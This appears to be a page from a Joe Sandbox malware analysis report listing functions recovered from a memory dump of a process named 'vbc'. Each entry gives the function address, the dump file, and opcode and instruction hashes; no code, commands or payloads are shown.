                            Function 0519E59C Relevance: .0, Instructions: 16COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                            • Instruction ID: 6f3cb8c1a38aff9e6355771ef23a00511681f23e2ea803ed27a98ce9e5f1a3f4
                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                            • Instruction Fuzzy Hash: CFD0A932204620ABE732AA2CFC04FD373E9BB88720F16085AB018C7050C360AC82CA84
                            Function 0515A0E3 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                            • Instruction ID: 00dc097804ef0db33da67e1e98ecb75dcba2735b506b44af487b3eeb6324567d
                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                            • Instruction Fuzzy Hash: D6D02232366030D3CB2896646804F636A1AAF80AA1F1A012D382A93800C2248C43D2E0
                            Function 0519C700 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                            • Instruction ID: 6049a35f25d7d9d360a2a32abc4f316747e0dc1a10242df7b79faca691b6d6c3
                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                            • Instruction Fuzzy Hash: 14C08C33290648AFD712EFA8CD01F027BB9EB98B40F100822F3048B671C631FD21EA84
                            Function 051E930B Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                            • Instruction ID: c8e62268667b2ba130fee30caf26853a974e63f52a16aee0559627cac00a024d
                            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                            • Instruction Fuzzy Hash: 35D0E275945A848EE726CB18C165F907BA4B705E40F850098E04247AA2C3689984CA00
                            Function 05180310 Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                            • Instruction ID: dd1449b24d2fb37228eb5ad1ee1dc17f3fa1120710b06ca98dd249aa44ae235a
                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                            • Instruction Fuzzy Hash: 3ED0123620024CEFCB12EF41D894DAA772AFBC8710F108019FD19077118A31ED62DA50
                            Function 0518340D Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                            • Instruction ID: 72ba872efea7a67e02ad1335d169d4ff9d8f8300da2bb8b05eebd6c9c3b72bbc
                            • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                            • Instruction Fuzzy Hash: 12C08C702415846AEB3B6710CD04F3C3760BB00A06F980D9CAA51295A2C3689C038A18
                            Function 05160750 Relevance: .0, Instructions: 9COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                            • Instruction ID: f6b3717219f1fc3ae33101877c2e0790a3883ac4113d61512a9d035e9b659962
                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                            • Instruction Fuzzy Hash: 2CC04879701A458FDF15DB2AD298F9977F8FB44750F150C90E809CBB22E764E901DA11
                            Function 051A4650 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b53359a369588e251fbf982a4ebe691657b113e035b7f7e8e9d7f3affd1ecf6f
                            • Instruction ID: fa9c5db650d2e1442cab77fa904cd724a4a7055273c67105207d983e9d01d474
                            • Opcode Fuzzy Hash: b53359a369588e251fbf982a4ebe691657b113e035b7f7e8e9d7f3affd1ecf6f
                            • Instruction Fuzzy Hash: E09002A260150052514071684D44446601997E17013D5C115E0556560C875C89559669
                            Function 051A3010 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 818c5df1e7b86d08f69074b9dcad312ef9eafee30350dba725a7e62d00caf15d
                            • Instruction ID: 2b036eb6701d77e48af2079dfee90d8a87016b9406c7aaf6303beea2af304e20
                            • Opcode Fuzzy Hash: 818c5df1e7b86d08f69074b9dcad312ef9eafee30350dba725a7e62d00caf15d
                            • Instruction Fuzzy Hash: 2990026220184452E14072684D44B4F411987E1602FD5C019E4157554CCA5989555B21
                            Function 051A3090 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 88887f598522a073130cdabf9801480e6bf12f60827d3edd78984d519144584f
                            • Instruction ID: bacda994ed082711a2ff81d5056323fd6fe6c6f0d19b9543ea200174fa4051ac
                            • Opcode Fuzzy Hash: 88887f598522a073130cdabf9801480e6bf12f60827d3edd78984d519144584f
                            • Instruction Fuzzy Hash: 4090026224140812E14071688954747001AC7D0A01F95C011E0026554D875A8A656AB1
                            Function 051A4340 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e31bbe755577057181250a0eaec6325a2727891245012edca6c658bcb6f55ad7
                            • Instruction ID: a8fd140b463ef6f22a737db3d03c3727bed5b8353723e2f319ca79d23d42071a
                            • Opcode Fuzzy Hash: e31bbe755577057181250a0eaec6325a2727891245012edca6c658bcb6f55ad7
                            • Instruction Fuzzy Hash: C190027260580022A14071684DC4586401997E0701B95C011E0426554C8B588A565761
                            Function 051A2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e121a098ea7fcddf2ef7f63598e33d0de0fad17c0ab2624f23771c5ee47a2b98
                            • Instruction ID: 1e08dd350e0eb27bbf9df4940ce02b728644980fa8e74fc7052e0222957f11b6
                            • Opcode Fuzzy Hash: e121a098ea7fcddf2ef7f63598e33d0de0fad17c0ab2624f23771c5ee47a2b98
                            • Instruction Fuzzy Hash: 2C90026A21340012E1807168594864A001987D1602FD5D415E0017558CCA5989695721
                            Function 051A3D10 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1fd7739cdf07d2374ffd0597ff7bb5afefcfb2a2d3e9dda3b111aeb28d24f3b9
                            • Instruction ID: 27f1e1cac99b12df112916fc48f98cc3f2bda1d0332f6f566a9f12172fe6e088
                            • Opcode Fuzzy Hash: 1fd7739cdf07d2374ffd0597ff7bb5afefcfb2a2d3e9dda3b111aeb28d24f3b9
                            • Instruction Fuzzy Hash: 2290027220240152A54072685D44A8E411987E1702BD5D415E0017554CCA5889615621
                            Function 051A2D00 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0323fab8643be6d4c89aeac0eb96b778353abadeed1d5adbcd2668a49e2e563
                            • Instruction ID: 182d475411fd0bd45211aad905f4710ac8ed2fe96938f54b6fe9211e4ed5d666
                            • Opcode Fuzzy Hash: d0323fab8643be6d4c89aeac0eb96b778353abadeed1d5adbcd2668a49e2e563
                            • Instruction Fuzzy Hash: 8D90026220544452E10075685948A46001987D0605F95D011E1066595DC7798951A531
                            Function 051A2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f214584423719924d9f667117890631645402c41c7229a7107ad1f0881c9b42
                            • Instruction ID: 26d11520bb0cab8579ed8ca3c75fe4e698788f550281f2f9dfd92bfd4ef12003
                            • Opcode Fuzzy Hash: 3f214584423719924d9f667117890631645402c41c7229a7107ad1f0881c9b42
                            • Instruction Fuzzy Hash: 7C90026230140013E140716859586464019D7E1701F95D011E0416554CDA5989565622
                            Function 051A3D70 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 79991c3a50b320730072350894b7fb99b90e2d44c4adac0e191d3eeb69646c7c
                            • Instruction ID: a9138ae149aa66460faa4897a48e223ec0d1f39eb0dbe82184376d3216bc2bb1
                            • Opcode Fuzzy Hash: 79991c3a50b320730072350894b7fb99b90e2d44c4adac0e191d3eeb69646c7c
                            • Instruction Fuzzy Hash: 3E90027620140412E51071685D44686005A87D0701F95D411E0426558D879889A1A521
                            Function 051A2DB0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9d3d2c3facc7a8cd140a93726ef4b398920f448a94f4066badcd4b0f1e5b537
                            • Instruction ID: f14a11e60df7b2b59f68a107eb0da092f9e61f90503ee19604f95beb78c6fec1
                            • Opcode Fuzzy Hash: a9d3d2c3facc7a8cd140a93726ef4b398920f448a94f4066badcd4b0f1e5b537
                            • Instruction Fuzzy Hash: E790027224140412E14171684944646001D97D0641FD5C012E0426554E87998B56AE61
                            Function 051A2DD0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aadb05c5ec05847f30c08c51ae969014e1d23ca13c90260f3d3110d87dc65145
                            • Instruction ID: e03dd7cb7ee505ab62ef265d35423f4c191ba12d7f54e16dcc362efcc991738f
                            • Opcode Fuzzy Hash: aadb05c5ec05847f30c08c51ae969014e1d23ca13c90260f3d3110d87dc65145
                            • Instruction Fuzzy Hash: FA900262242441626545B1684944547401A97E06417D5C012E1416950C866A9956DA21
                            Function 051A2C60 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 54b6498ea859efe87f9fb297a9f3872cb08ad5cc53324341105e0def7b2a950f
                            • Instruction ID: 7eed94a38aefbf05ff7b27db56fbafe9b27e9fbf8d3a16126846ed6cc0b837f3
                            • Opcode Fuzzy Hash: 54b6498ea859efe87f9fb297a9f3872cb08ad5cc53324341105e0def7b2a950f
                            • Instruction Fuzzy Hash: 4790027220140852E10071684944B86001987E0701F95C016E0126654D8759C9517921
                            Function 051A2CA0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36bca1a9ed7110b3d6fbee89bd96d2be03be6ef4b964d4d9b43463dcc4c72fac
                            • Instruction ID: 47949c2adfcebfc78cd4300f08f963fe70b423ba783cc7f324e185a9aaeba1e4
                            • Opcode Fuzzy Hash: 36bca1a9ed7110b3d6fbee89bd96d2be03be6ef4b964d4d9b43463dcc4c72fac
                            • Instruction Fuzzy Hash: B490027220140412E10075A85948686001987E0701F95D011E5026555EC7A989916531
                            Function 051A2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 873626021d45746bb2e85686e9e872694d50c0a0f74a008edd2ad56eff3e907a
                            • Instruction ID: 79184c49c2f9e3c1e80683beb26c9efdfa8a432fc97e0744b8d00894dd6a8fcf
                            • Opcode Fuzzy Hash: 873626021d45746bb2e85686e9e872694d50c0a0f74a008edd2ad56eff3e907a
                            • Instruction Fuzzy Hash: D790026260540412E14071685958746002987D0601F95D011E0026554DC79D8B556AA1
                            Function 051A2CF0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0de0a8bae039f963d851b051777758a41f87c50b8590c65fe9cf5d610d0115f9
                            • Instruction ID: e021def23761b196070fc5a06de6755e89f5c850336ca1e3c8b63e585df7f56b
                            • Opcode Fuzzy Hash: 0de0a8bae039f963d851b051777758a41f87c50b8590c65fe9cf5d610d0115f9
                            • Instruction Fuzzy Hash: B490027220140413E10071685A48747001987D0601F95D411E0426558DD79A89516521
                            Function 051A2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 931989eb4c67fefdba810374505babd8a9075b9c3ebd13889dbbbb6a9a092c78
                            • Instruction ID: 8eba9f4a4e90b2edd1ca4b9c12e5fbfa0a5875850536cd5f0bad0f2d71e34939
                            • Opcode Fuzzy Hash: 931989eb4c67fefdba810374505babd8a9075b9c3ebd13889dbbbb6a9a092c78
                            • Instruction Fuzzy Hash: ED9002A234140452E10071684954B460019C7E1701F95C015E1066554D875DCD526526
                            Function 051A2F60 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1481557aad53b83dc74438db459a322538e08005b76ec254ba8cb79238fc43d4
                            • Instruction ID: c8a09c1442674298c4fccc7822c3dbe0f25c2744703a6ca4a236ea1f9c10d7a6
                            • Opcode Fuzzy Hash: 1481557aad53b83dc74438db459a322538e08005b76ec254ba8cb79238fc43d4
                            • Instruction Fuzzy Hash: 409002A221140052E10471684944746005987E1601F95C012E2156554CC66D8D615525
                            Function 051A2F90 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6df07fa8052042e5f79b5ce3e6d6a7e2cafbc6e97f83b43844d123b1cc382073
                            • Instruction ID: 64769531f6563f8fd94f420143c1eea309eb9328dbe55eea933d197a25ad7402
                            • Opcode Fuzzy Hash: 6df07fa8052042e5f79b5ce3e6d6a7e2cafbc6e97f83b43844d123b1cc382073
                            • Instruction Fuzzy Hash: 9090027220180412E10071684D5474B001987D0702F95C011E1166555D876989516971
                            Function 051A2FB0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f9672e0516043a45cd6125bc1b1d10b886f3cd10bc4e4618baace20d11c834db
                            • Instruction ID: d92728928821a17136b96010de2b0ea83a33963eeaa8145b13c3baceac3d474c
                            • Opcode Fuzzy Hash: f9672e0516043a45cd6125bc1b1d10b886f3cd10bc4e4618baace20d11c834db
                            • Instruction Fuzzy Hash: 6B90026260140052514071788D849464019ABE1611795C121E099A550D869D89655A65
                            Function 051A2FA0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5bcdd31b0198baf70d3b378bb55580635d96060749da9319ebfd5e0ecf8eb46f
                            • Instruction ID: c18b9040857edeb38fd0201b4ec52f27ca2867237fe230315f4d304ef670481b
                            • Opcode Fuzzy Hash: 5bcdd31b0198baf70d3b378bb55580635d96060749da9319ebfd5e0ecf8eb46f
                            • Instruction Fuzzy Hash: 5890027220180412E10071684D48787001987D0702F95C011E5166555E87A9C9916931
                            Function 051A2FE0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 039bf36b2ead3ef8b6aa1044859ad7d79dc68fc6984bbc28f37cdc1780005578
                            • Instruction ID: c9c0ce2681d3fefe07b2d9ecf1b817bf8f8f3c882ba1ec71151afed02e49c1c7
                            • Opcode Fuzzy Hash: 039bf36b2ead3ef8b6aa1044859ad7d79dc68fc6984bbc28f37cdc1780005578
                            • Instruction Fuzzy Hash: C2900262211C0052E20075784D54B47001987D0703F95C115E0156554CCA5989615921
                            Function 051A2E30 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d243d246ffa2dec757b5f5139432150766b8753ff1dd0ae8f4c1e9eb614e351
                            • Instruction ID: 557c988d52ed2e348383e64527c05f311690444112d5f9267c56bb998dde0999
                            • Opcode Fuzzy Hash: 3d243d246ffa2dec757b5f5139432150766b8753ff1dd0ae8f4c1e9eb614e351
                            • Instruction Fuzzy Hash: AE90026230140412E10271684954646001DC7D1745FD5C012E1426555D87698A53A532
                            Function 051A2E80 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf64e1ee4a992dac397e5ef32fd7bda60c33e4edce8bacd942e187067793af8f
                            • Instruction ID: 55aa8b9e38d5a799cb792e6d3a3aa7cf8a284c66ed338703041ddeea74ac40cc
                            • Opcode Fuzzy Hash: bf64e1ee4a992dac397e5ef32fd7bda60c33e4edce8bacd942e187067793af8f
                            • Instruction Fuzzy Hash: 7890026260140512E10171684944656001E87D0641FD5C022E1026555ECB698A92A531
                            Function 051A2EA0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d03f6b646755b8782874c74352bfddddfb254b3f963e097f0d07d2bc5dc19c0e
                            • Instruction ID: fbc4bbcc7500b8c7d4494497faf4c6d71ec4e968d625890158299f7d2a990be3
                            • Opcode Fuzzy Hash: d03f6b646755b8782874c74352bfddddfb254b3f963e097f0d07d2bc5dc19c0e
                            • Instruction Fuzzy Hash: 8C9002B220140412E14071684944786001987D0701F95C011E5066554E879D8ED56A65
                            Function 051A2EE0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8f50e918ecfea440c6c319f75c1ddf3aa5ac26832e62250134f0fdee8f2d4597
                            • Instruction ID: 94503e45d81adde43e8f26f0ff138d2dd58e64fc65509b95a14fb94275d53b24
                            • Opcode Fuzzy Hash: 8f50e918ecfea440c6c319f75c1ddf3aa5ac26832e62250134f0fdee8f2d4597
                            • Instruction Fuzzy Hash: DC9002A220180413E14075684D44647001987D0702F95C011E2066555E8B6D8D516535
                            Function 051A39B0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e0b0781425f31b313b2835e2f55ebd187476cd795031462fb875cd6b7f6803b
                            • Instruction ID: 81cdaa948a9ac4ed2cd0dde21a52c120e1e782bb3bf262077ba4a33ae010e9d0
                            • Opcode Fuzzy Hash: 2e0b0781425f31b313b2835e2f55ebd187476cd795031462fb875cd6b7f6803b
                            • Instruction Fuzzy Hash: C490026224545112E150716C49446564019A7E0601F95C021E0816594D869989556621
                            Function 051A2B80 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8e99e1c09da53f03b07279b31ca2787a25aa7335f03c3d79bc515bc59a0719f6
                            • Instruction ID: 975901eb4c2875d0f7d3f0039b0f4ce422896c83f0d42b03ff86180024702919
                            • Opcode Fuzzy Hash: 8e99e1c09da53f03b07279b31ca2787a25aa7335f03c3d79bc515bc59a0719f6
                            • Instruction Fuzzy Hash: C090027220140812E10471684D446C6001987D0701F95C011E6026655E97A989917531
                            Function 051A2BA0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bc8f2ebd6f7b0c6c302015ec0d392eadbecba1bfa23d1643ee20383cea88e226
                            • Instruction ID: f451eafd4e963935c79a2013ebaf0eed3f67e9c0f78d06a526ada3e868d9fd84
                            • Opcode Fuzzy Hash: bc8f2ebd6f7b0c6c302015ec0d392eadbecba1bfa23d1643ee20383cea88e226
                            • Instruction Fuzzy Hash: D190027260540812E15071684954786001987D0701F95C011E0026654D87998B557AA1
                            Function 051A2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
